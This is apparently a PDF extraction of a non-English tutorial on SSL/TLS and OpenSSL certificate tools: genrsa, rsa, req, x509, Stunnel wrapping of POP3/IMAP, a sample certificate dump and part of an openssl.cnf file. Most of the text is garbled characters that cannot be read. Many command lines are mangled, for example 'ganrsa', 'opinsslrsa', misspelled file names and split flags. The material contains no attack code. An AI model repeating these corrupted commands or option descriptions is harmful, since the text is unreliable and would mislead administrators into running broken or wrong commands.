a – N&
5
3 6
T
F 2 7 !89 T P
'9
6,
) 6-
0, , < / 9 78#
2
"
-,5! %#
5 $ 6-
N
?,< nK'
"
. " ,
N&
P
! 78#
2 0,
'
P
! -,5!
N& …
?
6? # )
" ,
6
& , B)
,B
,
F )
, ,F
0
6
6
( ?
21
) 0,
) )
?@ c
!
0
* & (
) "
N & A) )
6 P. % H 6 ) "
?@ () %#
F
N& …
N & , B?
, B T P A) 2 %#
7
2 T
%#
0, <
- 4 1
g CP
6(
6
P . m.1
&
3 b' ,
F ?@
-
0,
F
A) 2
F
j
& " 0,<
&
A
L3 , B
) M 9 " ( u4
,
Gœ
L3 , B)
#
& ) -,< B
),
, < 2t5:
F
N& … %#<
N& A)
6-
.
!89 , 6 * ? N
'
n 9
@ ? )@
5! , B " ? N ) , & A
? 59 ?
6?
<& , B ) 2 "
,
T
3
, B)
N,56 ) "
N ,B ,B
5! , B
)
bP
1
< 6 V
?
5! , B
) -,
N & A) )
?
,
,
6 #P
<
<) 0-,
a" ,
–
0
2#5
L3 , B 0 <
2
5! , B
?@ , Z>
- Y ( u4 ? "
5! , B n P
: A) 2
0 <
?@ , * ,
u4 ,6 *
?@ D
B %#
A
0
,B 3
" %#
2 %/
x
0
5! , B k
F
%
/
0,< \,
?
5!
N& …p %#<
N
% H"E g
6
'L ?
E/ ?
F b
,B
&
5! , B
-,< T, )
1
, B" - Y
!
'L ?
,
-,
m .1 ?
, B 0,
0 <
-
U
),
7 !89 % ?@ " - Y
?@ N
7 !89 ? & n 9 "
,
&
7 !89
N
6
H- Y
. …
. "
I
. 0,<P '
N1, @
7 !89 • &
'7 !89 - 56)
'L ?
<
&
-,
, B 0A
L3
0,
&
6-
5 0
%
/ -,
-, < T
'
$7) Y
7
L3 , B %
? "@
-,
Hash
5
6-
,
,
'
&
0 <
-
1E
,4),
> 0
' B ( u4 - 56
5 …
5 "
L3 _ 1 E
( u4 ) ?
?
6( u4 Hash
/? & ) 1
?@ Hash +
6 u4
m .1 , < ? # Hash
L3 , B
? 56
6
2#5
I
,
P.
> ]
<
7) Y Hash
g
P .
-,
'
> U
7
),
O /
$,
6
( u4 Hash
'
) 2 ),
,
'
" -,
'
0 <
6-
5
5!, B
1E
" / 6-
5
)
F ) ( 4 n,L …
?@ b
6
L3 , B
L.
P! ?& )
<
, h
F n,L
F n, L
0
@
F
? "@" - Y
,
,
1E
6
b
F 6
Q
1/
<
$ <
( E
P! 5B )
6
5! , B
bP
( u4 n, L 0
6
- Y -, <
(E 9
,#
c 5G %5!
C
0
6-
<
( E
6-
™Y/ 6-
4
•A) ) S
n, L ( u4 , P
0
F
L3 , B 2< ?@ h
5 ) ( u4 n, L +H )
A"
F n,L
d*
, ,F -
()&B) ("c 6)
#1 " ? 59 ?& h
5
5
5 0, N,#
, A" ( u4 ,P n,L
6
0
-, !
6
5! , B] ,
6
T.
6
?
v ')
3
U)
?
2 4 i:
N
1P 0, <
60,
b
0
2
6
3 = D) ,
6
2 " M, 6, 6 % #
S
, $?
@
6
- E"
U)
6
?@
U)
) _= B*
6
U)
0,<
5 ™Y/ 2 X
YD)
6
%3
6
U)
F
6
,
?@ -,
6
U)
6
S
BB S
"
U)
F
2 0_, ,
6
U)
- 4]
…
A
W L*
2
),
-
,
P
G< 2 3@ " 6
6
> )( % <
6
> 0 <
Z> A 3
a SSL %•) 4
H- Y
#P< )
TCP/IP % # ) 4
c
c
6-
TCP/IP %# ) 4
)T
HTTP) LDAP) IMAP ,
6% # ) 4 )
0, <
F
SSL %# ) 4 …‹ %#<
c" c )
3
6
c"
,6
-" F SSL
BH
<
-,6
l '%#<
!89 ) , 5
E
,
)
F
N& 2 T L
SSL
U)
U)
M 9)
5! , B ) 6
%
BH 2 a SSL -, 6 U )
&'(
P! "
0, 5 %
5! , B
,6
-" F
-,<, 7
67 P
[ …
/ ? 59 )
N&
T
U)
a,
?# 2
9 ?56
SSL 0, @
)
R 4 ? # & % 5! 2 U #!] , 5 7 P
[ SSL
2 `56œ_
?
2 4 SSL
,
6"
,6
# " - Y
$ )
6
),
&
,
,
0
U)
6
,6
H
2 `560, 5 %
3 5! % H 6
),
BH 2 a SSL
-" F )
/ ? 59
&
1
U)
67 P[
0, 5 ,
,6
-" F
U)
) )
&'(
BH 2 a SSL 2 TL
)
0, 5 1P -,< & 7
) SSL Record protocol a
= G
6-
SSL
( u4 1P
$ 6( u4 2
%# ) 4 protocol SSL Handshake
% # ) 4 " - Y - . & SSL
1P " M, 60, 5
SSL
= G
9 P %# ) 4 0,
)
)
U)
a
0
?@ M 9 )
6
9
)
!89
K
&F % # ) 4 ) " SSL % # ) 4
-, < % #
'SSL
T
?
)
U)
" M ,6
U)
b
6
)
67 P
[
N&
N1O *
0,
_
3] )
U)
<,B
5! , B
,
- Y
U)
< , B)
5! , B
N& %
" g@ SSL Handshake ( u4
5! , B " - Y
<,B 3
( u4
&
U)
SSL
-" F )
B
F
6
)
N & TL
N& "
0,<
A 3
G F " ? 59 ) 6)
5! , B
G
U)
U
& $ 6-
? )@
67 P[ % < ,
9P %# ) 4
P
SSL % # ) 4
<,B
K
,6, -" F )
E
SSL
$
0,6
67 P
[
N& " - Y
SSL -,<
0, 5
P 4
N&
2t
5:
6
%# ) 4 " '2 0
œ, 5 7 P
[
U)
&
" '2 0
, B 2 0,6
H- Y
0,<
a, -,< - )@
"
83
9
%/
2
'L
-
T
$&
"
SSL *
N1- Y
SSL ^ P
U)
- 5< )
)
U)
!89 N ) -,<, 1
0, 5
U)
3 6
U)
6
3
)
-)8!
,< Y T) B
/
,<
U)
!89 &
6,
"
0, 5
0,
)
6-, < T
N& T L
E ?#
)
,
b
T
T
&
!89 " - Y
(8!
,
U)
7P
[ )
6
0, 5
0
'
N1
( ')
F
)@
& ) -,< 1P T.
&
)
6-
5! , B
E
T
)
0, 5
,B
-)8!
0,
U)
T
6,
g
- Y
U)
)
G
œ,
,< 3 6
)
,< -
5 3 TL
1
)
,
. ,B
&
F)
U)
1
)
. ,B
?@ -,< &
67 P[
3
)
- 56 -,< Z> ( u4
U)
,
" - Y
?@ ) -
)
1
)
67 P
[
.
3
U)
6
A 3
L3 , B " )
)
0, 5
U)
7
2
0, 5
, 5
,1
1P SSL
?
?@ " - Y
? 59 T
T9
B
F, B 1
)
. , B" - Y
T9
!89 0,<
B
F
2 `56œ <
( u4
. 2'
& )
u"
U)
?
) )
)
<,B
N& , B 2 " - Y
G -,< 1P 7 !89
0
B
F, B B )
T
6( u4
,6
\89 )
9 P " '2' ? 4
-, < &
u4 B )
( u4
U
G F"
%
/
U)
œ,<, 6 3 &
0, 5
0,<
9P " '2 ' ? 4
,
'
u4
U)
& )
U)
0
SSL
-,< <R V <
G F " ? 59 )
B
F , B ) -,
& $? )@
SSL
(5
&
B
F, B 2 " )
0, 5
6,
2
G
g
)
$,
- Y
,< -
U)
5 3 TL
,
. ,B
&
1
)
9P " '
- Y
67 P[
U)
6
A 3
)
3
6-
)
0, 5
U)
L3 , B " )
7
0, 5
, 5
,1
B
F, B 1
)
1P SSL
" ?
B
F
?@ " - Y
? 59 T
T9
. , B" - Y
T9
!89 0,<
2 `56a <
( u4
U)
?
N& )
. 2'
u"
) )
)
<,B
N& , B 2 " - Y
G -, < 1P 7 !89
GF
0
B
F, B B
0, 5
T
0,<
U)
6( u4
,6
\89 )
9P " '2' ? 4
0
,
SSL
-, < <R V <
G F " ? 59 )
&
u4 B )
-,< & ( u4
9P " '2' ? 4
$? )@
'
U
u4
B
F , B ) -,
U)
U)
&
B
F, B 2 " )
- Y
a )
9 ?560
6 ,
)
T
T
6 )
" ,
6
"
)
U)
3 6
" - Y
U)
)
SSL
6,
SSL
6,
P! ? "
0
Fv
s B
/
+:H
6,
667 P
[
U)
&'(
0, 5 7 P
[
U)
U)
)
,< Y SSL 9P " '
)
&'(
a,
6
)
SSL 9P " '
(5
&
/
a,< , 6 3 &
0, 5
" p B
/
%
€
0, 5
'
P
Qv 4
"
6
@
PG )
, @ ',< -,< —>
A 3
6
0,
6€,<
U)
2G
5! % H 6
12 0
6
3 5! % H 6
-,
( 2
0
3
1
&
6
U)
)
,
- )@
-,
6,<P
6
" ,G )
),
6
&
6, #
)
# ) #1 >
"
6
7 !89
) ,< -
: -, < - Y
)
,
u 6
6
)
1
5! , B @
: )
# ) #1 >
),
(
&
b
?@
>
L3 , B
6
0,< ,6 * ,
)
)
6
-,< +H )
)
U)
(
#P
< ?56
P
Q l '7c
(5
a
(E
*
+
"
6
2 " - Y
6, B E …
CRL ) CSR $ 6
,
( u4 -, #
&
E SSL
Shell n 9 "
0,<
DSA ) DH $ RSA
x.509
C
GH )
openssl
7 # " - Y
?
@
v 4
0,< ,6 *
OpenSSL
0,
?@ ,6 *
&
>
,
,
5! , B " - Y
-,< • 6
g
3
6
B
/ 2 €
0
2
&
U)
1 ( 2
),
0, 5
5! , B
,
TL 7
),
6
@
" DN ,B'
1 -, @ 6
< 5 ,
-,
1SSL
0, 5 'X
€,
6
"
&
6)
),
?@ N
&
),
R4
3 5! % H 6
U)
),
6
N1 B )
TLS ) SSL
E …
P. …
& )?
U)
?
…
S/MIME -,< &
6( u4
, …
a
openssl
"
) )
& …
'
Openssl command [ command_opts ][ command_args ]
2G
-
#B
5! \
,<
Y?
" –
0,
- 56
N -
7
6
@"
" - Y
&
1/ 6
,
)
;!
2 0 <
&
U)
?
passphrase
2 ?
)
)
S F ( 5 ?, E
,
) )
?, <
?
- Y
7
passout
" (,
"
6S
6
"
passin
R 10, <
0
<
6
, B2
<
"
passphrase
^
<
F?
5
# &' >/ passphrase
5L ?# 2 " - Y
6
& "
'
& b
passphrase 5B
0
d*
,
<
?
)
_ F) 3
passphrase
) )" ^
a
"
& ) 2
openssl
4? !
- Y passphrase 7 P! " …pass : passphrase
0 <
0 <
- Y passphrase ?, 3
" 0 < - Y ? &56 9
( 5 % < T)
L3 , B
6)
<
,< passphrase
# ?
1/ 2
6 6
)
F ( N6
] passout- passin
S
L3 , B
-" , -
0,
)
# " %P
H
6
G ?, 2 0
Y
2
" ?
L3 , B 2 " -,< , 1
2
,
3
%
L3 , B 2 " - Y
F ( N6 < - Y U )
9
6
2
N M 9 " 0,<P - Y % H ?,< -, " 7
,
M 9"
7
passphrase ,
^
&
",
2 ( 5 x509 ) genrsa req , rsa
"
H
P
10,
$, , 1 CSR
2 U
3b
6
#
0 5 - Y
),
0 < >
(E ?
, 1 ( N60 < - <
2 0
6
4
PU )
3
' )
0
),G -,!" - Y
("c SSL
),
0 <-
command
,G
L3 , B
, 5 T
2
< ,
- Y var :.
u
, " - env : var
pathname % 'T) : " -file : pathname
…passout ) …Passin & )
% ' "
0 <
passphrase ?,
3
()
) ) passphrase ?,
: " )
3
T) :
0 <
- Y passphrase ?,
3 , < number ?@ M G - 5<
- Y
F) 3
B'" -fd : number
0 <
e 'j 4
& "
#B
5! 2
<
>G - 56
manual 7 .Y
-, 3
,
) )" 9
0,<
5 stdin " - Y
Passphrase - stdin
"
x509 ) rep , rsa , genrsa 7
7
2
0 <
U4
,G
-
6 5 H
iX
@ T) ,
0
6
F)
@
a genres
%# <
2
RSA
B ( '0 )
L3 , B , 1
2
0,<
"
Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4]
[-3] [-rand file (s)] [numbits]
aT) ,
-out filename
<
< ?@
F) 3
L3 , B
- Y
F) 3 % '(
& 2 "
0,
<
-idea − des3 -des
&
IDEA
DES3, DES
0,
- Y
6 &
6
d*
< stdout
N1"
# "
L3 , B ?
-passout arg
DES3, DES
?
d*
a,
0
N1"
# "
$ <- Y , B ?
0 <
numbits
6
- Y
& 2 "
Šwp ?@ e Y 4 ,
, 1 passphrase ?), )
IDEA
&
F) 3 % 'passphrase
›,
d*
wqp‹ T 9
, BT 9
L3 , B
"
openssl genrsa - out rsakey. Pem 1024
) DES3
N1 -, < &
wqp‹ T 9
L3 , B
a,
"
, 1 W 3 passphrase
openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3
1024
a rsa
?
2 " - Y
6, B' ,
0
u
a,<
0)
@
. 0
" %#<
RSA
6, B
% ,P N
'
2
,
B ( '0 5 -,6
2
' "
6, B
, B =B*
opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg]
[−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus]
[−check][− pubin][− pubout]
aT) ,
- inform
NER, PEM ,
,
NER, PEM?
,
d*
,
2 G
L3 , B
) )"
F) 3 , B
) ), B
% <
- Y
& 2 "
?@ paaaphrase , < -, < &
&
'
) )% '
0 <
- passin arg d *
'
PEM ?@ e Y 4 , 0,< DER
0
- infilename ,
) ), B
PEM ?@ e Y 4 , 0,< DER
0
- outform
2 G
6 &
-, 3
) ),B
0 <
- out filename "
0,
d*
<
,
-,< < ?@
F) 3
L3 , B
F) 3 , B
B'
- Y
& 2
0 <
- passout arg d *
?@ passphrase , < -, < &
&
F) 3 , B
0 <
− des − des 3 − idea
?
IDEA
&
DES, DES
6
0,
- text
7
-, < ,
1/
- noout
F) 3
- Y
-)8!
0,
N1"
# "
L3 , B
L3 , B
'
F) 3
& -
L3 , B 6,B'-,< , ( ' & 2 "
Y
0, < 5
- modulus
0,
0,
V4
6D F) 3
L3 , B
6,B'
6D
, B modulus 5 H
passphrase
"
Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem
-,
3
,
) ) " passphrase] ,
&
L3 , B
"
a_ <
openssl rsa- in inkey. Pem –des3 out outkey. Pem
a,6
?
L3 , B
7
.
"
openssl rsa-in inkey. Pem – text - noout
a req
, B, 1
?@ " ?
a,<
,
60 <
" %#<
2
- Y CSR
,
B ( '0 5 - Y &
2 "
6
)
L3
opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename]
[− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)]
[−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM
DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n]
[−asn1− kludge][−newhdr][−extensionssection][−reqextssection]
aT) ,
-inform NER, PEM ,
,
0
-outform NET, ,
) ),B
F) 3 CSR
2 G
PEM ?@ e Y 4 , 0,< DER
d*
CSR
) )"
) ) CSR
,
,
% <
&
) )% '
- Y
?@ paaaphrase , < -, < &
& 2
7
-,< ,
1/
-)8!
0,
-noout
-modulus
F) 3
CSR
6 D F) 3
'
d*
CSR
6,B'
F) 3
6, B'-, < , ( ' & 2 "
CSR %3
-, 3
) ) CSR
0 <
-text -
'
PEM
0 <
-passin arg
'
PEM ?@ e Y 4 , 0,< DER
,
0
-infilename "
2G
6 &
&
Y
0, < 5
6D
5!, B modulus
5 H
0,
-new 7 !89 )
E
<
CSR
0 <
- Y -, < d *
_0 <
-newkey rsa: bits CSR
-keyout filename
E ;!
'
,
–key
& 2 " - Y
) )" & "
, B " CSR
& "
,1 ,B
,< -,
) PSA
L3 , B
0,
d*
,B 6
<
< ?@
d*
]
& 2 " - Y
,G Bits 0 <
L3 , B
B'(
,
-x509
E root 6
CSR
<
F
,1
& 2
d*
& 2 " - Y
0 <
-days n
P! ?& n ,< -,< - Y –x509
6
& "
0,
, 1 CSR
a,
L3 , B
d*
" - Y
"
openssl req - new- key key. Pem - out req. pem.
a,
, 1 ? &56 9
CSR
)
L3 , B
"
openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem.
a,
, 1 ? &56 9
root 6
)
L3 , B
"
openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem.
x509
B ( '0 <
- Y
6
),
&
b
6
a,<
,
2 "
" %#<
2
opensslx509[−informDERPEMNET][−outform
DERPEMNET][−keyform
DER
PEM][−CAformDERPEM][−CAkeyform
DERPEM][−infilename
][−outfilenam
e]
[−hash][−subject
][−issuer][−nameopt
][−enddate
][−purpose
]
option][−email][−startdate
[−dates][−modulus][− fingerpr
int][−alias][−noout][−trustout
][−clrtrust
][−clrreject
]
[−addtrust
arg][−addreject
arg][−daysn][−signkeyfilename
][−x509toreq][−req][−CAfilename
]
[−CAkeyfilename
][−CAcreatese
rial][−CAserialfilename
][−text][−C][−md2− md5 − shal − mdc2]
[−clrext][−extfile][−extfilefilename
][−extensions
section]
a T) ,
- inform $PEM ,
,
- outform $PEM ,
,
'
NET
F) 3 CSR
2 G
'
PEM ?@ e Y 4 , 0,< DER
0
0,
-,
) ) CSR
2 G
PEM ?@ e Y 4 , 0,< DER
0
- in filename
6 &
d*
CSR
,
) ) CSR
3
% <
NET
) )% '
- Y
& 2 "
0 <
- out filename "
0,
d*
,
CSR
-,< < ?@
) ) CSR
) )"
B'
- Y
& 2
0 <
- text
7
-, < ,
1/
0,
- nooout
CSR
F) 3
CSR
-)8!
'
-, 3
F) 3
6, B'
& -
6, B
'-,< , ( ' & 2 " - Y
0, < 5
- modulus
F) 3
6
5! , B modulus 5 H
%3
0,
- serial
- hash 0,
0,
- subject
- issuer
6D F) 3
6D F) 3
0,
0,
6D
6
6
S/
6D F) 3
6D F) 3
6
6D
T
- 5<
( hash
,
6
(
-,
S/
(
- email
6 D F) 3
6
S/
# ) #1
4h @
0,
- startdate
0,
- enddate
- dates
6D z) 3
0,
0,
6D z) 3
6D F) 3
- fingerprint
0,
- signkey filename
6
>
6D F) 3
6
<
E filename
>
v
) ),
v
1E
;!
'
v
6
6
root 6
),
>
& 2 " - Y
H
L3 , B " - Y
0 <
- keyfrom ,
,
) )
L3 , B
PEM ?@ e Y 4 , ,< DER
0
- days n
d*
P! ?& n ,< -,< - Y –x509
6
% , PCSR
- Y
d*
6
–signkey
2
PEM
& "
0,
- x509toreq , B " 0,
&
'
& 2
-,< -
L3
0 <
- req
-,
3
) )? !
-,
3
) )
6
e Y 4
CSR
1/
& 2 " - Y
0 <
0 <
- CA filename ?
>
6
0 <
- Cakey filename " ?
-
Caserial
d*
filename
4( "
&
nB
G
& 2 b
6
d*
),
& 2 b
7 P
! % '2 (
4 -)8!
,
6
E
),
<
&
6CERTICATE T
0srl ,
- CA createserial
d*
>
0 <
),
6
- Y
L3 , B
<
- Y ?@
- 5< ) / % '
e Y 4 , 0,
&
6certificate T
^
6
- 5< % '
filename
- extfile filename ,
H ?@
6extention
- Y
0,
- extentions sectio
& 2 "
W 3 extention
6
d*
? )&'
0 <
a,6
?
6
B'
7 !89
- Y
"
openssl x509 – in cert. Pom-noout-text
a,6
?
6
T
- 5< "
openssl x509 – in cert. Pom-noout-serial
a,6
?
6
S/
(
"
openssl x509 – in cert. Pem – noout-subject
a,6
?
6
1E
>
"
– fingerprint openssl x509 – in cert. Pem – noout
% ,P DER
a,
' PEM
'"
6
"
openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER
a,
% ,P CSR
6
"
openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem
a,
% ,Proot 6
CSR
"
openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom
>
6
),
&
L3 , B ) 6
" - Y
CSR
"
a,
openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial
F) 1/ ) SSL b
a
-,< & 7 !89 ?
)
,
#4
? !
.
?
@2
&
"
H ) ,<
" ,
T) ,
" U4 -
1/ )
a
2
U)
…
], 5 T
#
,
U)
5 -, <
- < Stunnel
) )
6
F) 3
' ),
,<
6
@
9
] ,<
-, < &
"
'
- Y SSL Wrapper
\ 2 0
E n 9 2, ?
)
I
0_ IMAP )
6 &'(
7Y
SLL
5 SSL
1/ 2
"
,
?
SSl " - Y ?#
'X ?@
) '
6 &'(
I
0 _Apache O) )
b' 1/ 2
7 !89 T
6U )
SSL 7 #
) ,<
0
&
=B*
'
a
'
)
)
L3 , B
L3 , B
,1
openssl genrsa – out key. Pim 1024
a CSR
0
L3 , B b
?@ ?
>
a
6
'
),
CSR ?
&
" - Y CSR ?
"
,1
'
>
openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out .
pem – days 365
POP3 )
- 56
Stunnel &'(
SSL " -,Y - . \ X
" POP3 )
?,<
- 56 SSL " - Y
a
2#5 n 9 )
2<)
5 H2
<
-
iX
Stunnel " 0 <
- Y
7
4
@)-
,6
A
a
'
{{Š - 5 < 7
wwq - 5 < 7 4
H
)
6script
7
4"
b
,
7 !89 Stunnel
-, < &
7 !89 2 ) ,
"
7
Y wwq - 5<
2
0, < A"
4
Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110
U)
,
)"
'
7
-,< & 7 !89 Stunnel
{{Š - 5< 7 4 "
2
0,
F -, <
&
a
!89 2 A"
H
4
6Script
7
Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd
)
L3 , B % < S
stunnel.pem c
% '
, B " , G Stunnel.pem % ' 0, <
0,<
<
_ -,
F) ,
&
)
7
13 :
6
] )
) W 3 L*< ¢
^P 2
0,
,
— )
? 59 5 <
? 3 IE
"
,
6
6
, 5 '—
"
5<
- P< ?#
!89 % < ,
: 56
6
0_ B
# %. $ P! 7, $ % 5 h @ $ ( , 56$
- 5 >
7 !89 2
L*< 1 E
hash
% H 56
? 4
)
H
,
> )
5<
'2
F T/
6
?@ S/
)h @
5! , B % < 6
I
" - Y )
6
CA 0
5! - ›,
) > )-
R ,
$O)
CA
' 7 !89
7 )&B "
5<
@
&
L3
0
@^
2 0,
—L*<
—
5<
, 5
)
R
6 6
) 1E
N
2 2 `560
0,<
$, - 5
^P
< ? 59
6 ],
7 !89 )
),
N c 5G 5<
" €,<
$, 6 ? 59 )
L3
—6
M 9 ?@ — › GH ) @ €, - ›
'2 ) -
)
6
" ,G & )
a Certificate
? I
6
5<
5! &
5
'
N 56
6
c 5G 0,<
C
2
SSL
(Certificate Autority)
6>
56
1% <
a
"7
—6
¢ 2 * A)
CA.pl −newcert
(openssl req −config /etc/openssl.cnf −new −x509 −keyout newreq.pem \
−out newreq.pem −days 365)
#
b
F
6
6
6
0
,
( 5 0,
? 59 % H
g
5 <$
1E
u) j
-,< >
3 6
0,
?@
66 6
>
"
)% HC
8
-, < >
$,
T
6
6
) > A 3
\ 2 " 6CA
6
a
6
6
2 "
#
"
5
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root
CA/[email protected]
Not Before: Nov 20 05:47:44 2001 GMT
Not After : Nov 20 05:47:44 2002 GMT
Subject:
C=FJ,
ST=Fiji,
L=Suva,
O=SOPAC,
CN=www.sopac.org/[email protected]
Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
6c:14:e2:ae:62:e7:6b:30:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
OU=ICT,
Public
Key
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
X509v3 Authority Key Identifier:
keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5
:A6
DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root
CA/Email=administrator@serial:00
Signature Algorithm: md5WithRSAEncryption
34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
bc:5a
−−−−−BEGIN CERTIFICATE−−−−−
MIIDoTCCAwqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBiTELM
AkGA1UEBhMCRkox
DTALBgNVBAgTBEZpamkxDTALBgNVBAcTBFN1dmExDjAMBgNVB
AoTBVNPUEFDMQww
CgYDVQQLEwNJQ1QxFjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJ
jAkBgkqhkiG9w0B
CQEWF2FkbWluaXN0cmF0b3JAc29wYWMub3JnMB4XDTAxMTEyM
DA1NDc0NFoXDTAy
MTEyMDA1NDc0NFowgYkxCzAJBgNVBAYTAkZKMQ0wCwYDVQQIE
wRGaWppMQ0wCwYD
VQQHEwRTdXZhMQ4wDAYDVQQKEwVTT1BBQzEMMAoGA1UECxMDS
UNUMRYwFAYDVQQD
Ew13d3cuc29wYWMub3JnMSYwJAYJKoZIhvcNAQkBFhdhZG1pb
mlzdHJhdG9yQHNv
cGFjLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAu
lQsq4h0qms1panB
0Fqb+2u1cbzv06sVzFt1cza4AdFZP8GIwDORBPG/GrR6yDnCi
R+HD5EZgQlGDIYI
2HXEb1qYSvn49zgk/L2UJDer8RzYke77G5+IuiXa9iF/BDI1F
z02HPu3Mp5Cr3e2
JRxZaa++AKH4sBpsFOKuYudrMOkCAwEAAaOCARUwggERMAkGA
1UdEwQCMAAwLAYJ
YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZ
mljYXRlMB0GA1Ud
DgQWBBT+BEbtoBW+wUtZA/gtDe0q4O35LzCBtgYDVR0jBIGuM
IGrgBTmEnw9oQLl
uh/anje+40U+m67lpqGBj6SBjDCBiTELMAkGA1UEBhMCRkoxD
TALBgNVBAgTBEZp
amkxDTALBgNVBAcTBFN1dmExDjAMBgNVBAoTBVNPUEFDMQwwC
gYDVQQLEwNJQ1Qx
FjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJjAkBgkqhkiG9w0BC
QEWF2FkbWluaXN0
cmF0b3JAc29wYWMub3JnggEAMA0GCSqGSIb3DQEBBAUAA4GBA
DSN+2ULhVviRAnw
VTE7KSv0/apf27gRGsarM2dZwQTeNN8IVy7GYNz31OLxc5dXI
1ACY/x4ljSzysQb
xUzIFmm7nEp+ABlIYuJRqzr6/YjN4J3vZ1Da/ksTxQyM/K1ut
e5A4/00EJ+tNL3b
Bu0JPfKmgSJjFtyuMwxw/Qpsr7xa
−−−−−END CERTIFICATE−−−−−
nB
G
5! , B 0
n:
# " ? 59
,B 6
T
?@
# 0, ›
6
, B
0
B
. "
B
.
#
]
<
- Y
6
6
'X
R &
T
-,
'-,< ,
?@ S/
b
-, <
-,< > ( 4
F
6
6
b'
2 0 <-
,
P! $
N 56
2 S/
7 !89
F " , P & 6, B 2
&
' 56 ) / 6
)/
> ? ") 6
2
N %.
- Y
GF
"
,
#
3
L3
L3 , B N 7 P
!
6-
) 6 6
, P)
$,
<
R & ( 4b
. ,
)_
L3
a OpenSSL ,
#4% '
#−−−Begin−−−
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#
RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids
# To use this configuration file with the "−extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)
[ new_oids ]
# We can add new OIDs in here for use by '
ca'and '
req'
.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6
###########################################################
#########
[ ca ]
default_ca = CA_default # The default ca section
###########################################################
#########
[ CA_default ]
dir = /var/ssl # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.
certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file
x509_extensions = usr_cert # The extentions to add to the cert
# Extensions to add to a CRL. Note: Netscape communicator chokes on
V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext
default_days = 365 # how long to certify for
default_crl_days= 7 # how long before next CRL
default_md = sha1 # which md to use.
preserve = no # keep passed DN ordering
# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :−)
policy = policy_match
# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
# For the '
anything'policy
# At this point in time, you must list all acceptable '
object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
###########################################################
#########
[ req ]
